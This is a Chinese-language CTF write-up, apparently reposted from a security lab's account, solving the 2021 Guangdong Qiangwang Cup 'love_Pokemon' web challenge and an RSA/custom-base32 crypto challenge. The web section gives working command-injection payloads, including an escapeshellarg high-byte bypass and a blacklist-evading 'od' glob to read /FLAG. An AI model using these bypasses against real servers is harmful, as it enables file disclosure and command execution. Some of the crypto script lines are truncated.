2021广东强网杯|WEB及Crypto方向WP

  • A+
所属分类:CTF专场

WEB方向


K1ng_in_h3Ap_I


K1ng_in_h3Ap_I


K1ng_in_h3Ap_I


K1ng_in_h3Ap_I





## love_Pokemon

<?phperror_reporting(0);highlight_file(__FILE__);$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';if(!file_exists($dir)){mkdir($dir);}function DefenderBonus($Pokemon){if(preg_match("/'||_|\$|;|l|s|flag|a|t|m|r|e|j|k|n|w|i|\\|p|h|u|v|\+|\^|`|~|||"|<|>|=|{|}|!|&|*|?|(|)/i",$Pokemon)){die('catch broken Pokemon! mew-_-two');}else{return $Pokemon;}}function ghostpokemon($Pokemon){if(is_array($Pokemon)){foreach ($Pokemon as $key => $pks) {$Pokemon[$key] = DefenderBonus($pks);}}else{$Pokemon = DefenderBonus($Pokemon);}}switch($_POST['myfavorite'] ?? ""){case 'picacu!':echo md5('picacu!').md5($_SERVER['REMOTE_ADDR']);break;case 'bulbasaur!':echo md5('miaowa!').md5($_SERVER['REMOTE_ADDR']);$level = $_POST["levelup"] ?? "";if ((!preg_match('/lv100/i',$level)) &&(preg_match('/lv100/i',escapeshellarg($level)))){echo file_get_contents('./hint.php');}break;case 'squirtle':echo md5('jienijieni!').md5($_SERVER['REMOTE_ADDR']);break;case 'mewtwo':$dream = $_POST["dream"] ?? "";if(strlen($dream)>=20){die("So Big Pokenmon!");}ghostpokemon($dream);echo shell_exec($dream);}?>
根据hint.php得知flag全大写。
if ((!preg_match('/lv100/i',$level)) &&(preg_match('/lv100/i',escapeshellarg($level))))
escapeshellarg处理后 ASCII 大于 %80的字符会被过滤
myfavorite=bulbasaur%1 21&levelup=lv%81100
2f4850466af6a0a50752be95d64c997672baa2980ee888c9daa9d389227c3724<?php$hint = 'flag is located in / , and NAME IS FLAG';

fuzz一下读文件的命令发现留有一个od命令,结合正则来读flag即可:
```myfavorite=mewtwo&dream=od%09/F[@-Z][@-Z]G```
```0000000 066146 063541 050173 070150 051137 031543 030537 057563 0000020 031526 074522 041537 030060 057461 072502 057564 057511 0000040 030154 031566 050137 065557 066545 067157 076576 000012 0000057```

用:https://rainbowpigeon.netlify.app/posts/zh3r0ctf-2021/#strpos-and-substr的脚本转一下得到flag
```dump = "0000000 066146 063541 050173 070150 051137 031543 030537 057563 0000020 031526 074522 041537 030060 057461 072502 057564 057511 0000040 030154 031566 050137 065557 066545 067157 076576 000012 0000057"octs = [("0o" + n) for n in dump.split(" ") if n]hexs = [int(n, 8) for n in octs]result = ""for n in hexs: if (len(hex(n)) > 4): swapped = hex(((n << 8) | (n >> 8)) & 0xFFFF) result += swapped[2:].zfill(4)print(bytes.fromhex(result).decode())```

2021广东强网杯|WEB及Crypto方向WP


Crypto方向


K1ng_in_h3Ap_I


K1ng_in_h3Ap_I


K1ng_in_h3Ap_I


K1ng_in_h3Ap_I





rsa and base?

BASE:"GHI45FQRSCX****UVWJK67DELMNOPAB3"flag{TCMDIEOH2MJFBLKHT2J7BLYZ2WUE5NYR2HNG====}

维纳攻击之后就是⼀个base32的换表,需要爆破四位进⾏解密,且只需要寻找原有表中
未出现的字。
import base64STANDARD_ALPHABET = b'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'list = 'TYZ2'for i in list:for j in list:for p in list:for q in list:answer = i+j+p+qLIST = 'GHI45FQRSCX'+answer+'UVWJK67DELMNOPAB3'CUSTOM_ALPHABET = bytes(LIST, encoding="utf8")ENCODE_TRANS = bytes.maketrans(STANDARD_ALPHABET, CUSTOM_ALPDECODE_TRANS = bytes.maketrans(CUSTOM_ALPHABET, STANDARD_ALPdef encode(input):return base64.b32encode(input).translate(ENCODE_TRANS)def decode(input):return base64.b32decode(input.translate(DECODE_TRANS))flag = (decode(b'TCMDIEOH2MJFBLKHT2J7BLYZ2WUE5NYR2HNG===='))#print(flag)if b'rsa_and_base'in flag:print(flag)


- END -
2021广东强网杯|WEB及Crypto方向WP

2021广东强网杯|WEB及Crypto方向WP

原文始发于微信公众号(山石网科安全技术研究院):2021广东强网杯|WEB及Crypto方向WP

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: